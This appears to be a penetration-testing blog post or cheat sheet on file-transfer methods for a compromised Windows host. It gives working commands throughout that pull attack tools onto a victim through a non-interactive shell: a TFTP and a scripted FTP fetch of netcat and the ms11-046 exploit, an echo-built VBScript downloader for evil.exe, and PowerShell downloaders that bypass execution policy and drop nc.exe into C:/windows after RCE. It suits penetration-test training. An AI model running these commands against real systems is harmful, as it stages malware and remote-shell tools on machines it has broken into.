File transfer methods

File Transfers
limit commands on shell to be non-interactive
https://blog.netspi.com/15-ways-to-download-a-file/
TFTP
Windows XP and Win 2003 contain tftp client. Windows 7 do not by default
tfpt clients are usually non-interactive, so they could work through an obtained shell

atftpd –daemon –port 69 /tftp

Windows> tftp -i 10.10.10.10 GET nc.exe

FTP
Windows contain FTP client but they are usually interactive
Solution: scripted parameters in ftp client: ftp -s
ftp-commands

echo open 10.10.10.10 21> ftp.txt
echo USER anonymous anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET ms11-046.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

VBScript
wget-vbs script echo trick again, copy paste the commands in the shell

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“WinHttp.WinHttpRequest”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“MSXML2.ServerXMLHTTP”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“Microsoft.XMLHTTP”) >> wget.vbs
echo http.Open “GET”,strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject(“Scripting.FileSystemObject”) >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = “” >> wget.vbs
echo strBuffer = “” >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.102/evil.exe test.txt

Powershell

 echo $storageDir = $pwd > wget.ps1
 echo $webclient = New-Object System.Net.WebClient >>wget.ps1
 echo $url = "http://10.10.10.10/evilscript.ps1" >>wget.ps1
 echo $file = "evilscript.ps1" >>wget.ps1
 echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

using powershell to download files. this can be coupled with RCE or web application like PRTG

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.23/nc.exe','C:/windows/znc.exe')"

Tagged in:,

0 Comments

Leave a Reply

Your email address will not be published.